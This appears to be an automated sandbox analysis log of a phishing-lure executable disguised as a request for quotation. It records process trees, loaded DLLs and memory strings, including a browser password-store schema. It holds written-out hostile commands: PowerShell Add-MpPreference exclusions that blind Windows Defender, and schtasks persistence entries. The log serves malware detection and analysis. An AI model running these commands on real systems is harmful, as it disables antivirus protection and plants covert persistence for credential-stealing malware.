Source: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000000.00000000.1359257130.0000000000BD2000.00000002.00000001.01000000.00000003.sdmp, NuDUTBObHpKADz.exe.0.dr Binary or memory string: UPDATE [dbo].[CREDIT] SET [CREDIT_NO] = @CREDIT_NO, [CREDIT_DATE] = @CREDIT_DATE, [CREDIT_PERIOD] = @CREDIT_PERIOD, [CREDIT_END_DATE] = @CREDIT_END_DATE, [CREDIT_BEGIN_DATE] = @CREDIT_BEGIN_DATE, [CLIENT_ID] = @CLIENT_ID, [PROD_CODE] = @PROD_CODE, [CREDIT_SUM] = @CREDIT_SUM, [CREDIT_NOTE] = @CREDIT_NOTE, [MODIF_DATE] = @MODIF_DATE WHERE (([CREDIT_ID] = @Original_CREDIT_ID) AND ([CREDIT_NO] = @Original_CREDIT_NO) AND ((@IsNull_CREDIT_DATE = 1 AND [CREDIT_DATE] IS NULL) OR ([CREDIT_DATE] = @Original_CREDIT_DATE)) AND ([CREDIT_PERIOD] = @Original_CREDIT_PERIOD) AND ((@IsNull_CREDIT_END_DATE = 1 AND [CREDIT_END_DATE] IS NULL) OR ([CREDIT_END_DATE] = @Original_CREDIT_END_DATE)) AND ((@IsNull_CREDIT_BEGIN_DATE = 1 AND [CREDIT_BEGIN_DATE] IS NULL) OR ([CREDIT_BEGIN_DATE] = @Original_CREDIT_BEGIN_DATE)) AND ([CLIENT_ID] = @Original_CLIENT_ID) AND ((@IsNull_PROD_CODE = 1 AND [PROD_CODE] IS NULL) OR ([PROD_CODE] = @Original_PROD_CODE)) AND ([CREDIT_SUM] = @Original_CREDIT_SUM) AND ((@IsNull_CREDIT_NOTE = 1 AND [CREDIT_NOTE] IS NULL) OR ([CREDIT_NOTE] = @Original_CREDIT_NOTE)) AND ((@IsNull_MODIF_DATE = 1 AND [MODIF_DATE] IS NULL) OR ([MODIF_DATE] = @Original_MODIF_DATE)));
Source: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000000.00000000.1359257130.0000000000BD2000.00000002.00000001.01000000.00000003.sdmp, NuDUTBObHpKADz.exe.0.dr Binary or memory string: UPDATE [dbo].[CREDIT_PRODUCT] SET [PROD_NAME] = @PROD_NAME, [PROD_ACTIVE] = @PROD_ACTIVE, [PROD_SUM_FROM] = @PROD_SUM_FROM, [PROD_SUM_TO] = @PROD_SUM_TO, [MODIF_DATE] = @MODIF_DATE WHERE (([PROD_CODE] = @Original_PROD_CODE) AND ([PROD_NAME] = @Original_PROD_NAME) AND ([PROD_ACTIVE] = @Original_PROD_ACTIVE) AND ([PROD_SUM_FROM] = @Original_PROD_SUM_FROM) AND ([PROD_SUM_TO] = @Original_PROD_SUM_TO) AND ((@IsNull_MODIF_DATE = 1 AND [MODIF_DATE] IS NULL) OR ([MODIF_DATE] = @Original_MODIF_DATE)));
Source: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3829829868.0000000003378000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3829829868.0000000003345000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3829829868.0000000003353000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3829829868.0000000003385000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000000.00000000.1359257130.0000000000BD2000.00000002.00000001.01000000.00000003.sdmp, NuDUTBObHpKADz.exe.0.dr Binary or memory string: INSERT INTO [dbo].[CREDIT_PRODUCT] ([PROD_NAME], [PROD_ACTIVE], [PROD_SUM_FROM], [PROD_SUM_TO], [MODIF_DATE]) VALUES (@PROD_NAME, @PROD_ACTIVE, @PROD_SUM_FROM, @PROD_SUM_TO, @MODIF_DATE);
Source: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe ReversingLabs: Detection: 52%
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe File read: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe "C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe"
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NuDUTBObHpKADz" /XML "C:\Users\user\AppData\Local\Temp\tmp8B51.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Process created: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe "C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe"
Source: unknown Process created: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NuDUTBObHpKADz" /XML "C:\Users\user\AppData\Local\Temp\tmpA2A1.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Process created: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe "C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe"
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Process created: C:\Windows\System32\wbem\WMIADAP.exe wmiadap.exe /F /T /R
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe" Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe" Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NuDUTBObHpKADz" /XML "C:\Users\user\AppData\Local\Temp\tmp8B51.tmp" Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Process created: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe "C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe" Jump to behavior
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NuDUTBObHpKADz" /XML "C:\Users\user\AppData\Local\Temp\tmpA2A1.tmp" Jump to behavior
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Process created: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe "C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe" Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Section loaded: dwrite.dll Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Section loaded: windowscodecs.dll Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Section loaded: dwrite.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Section loaded: windowscodecs.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Section loaded: urlmon.dll Jump to behavior
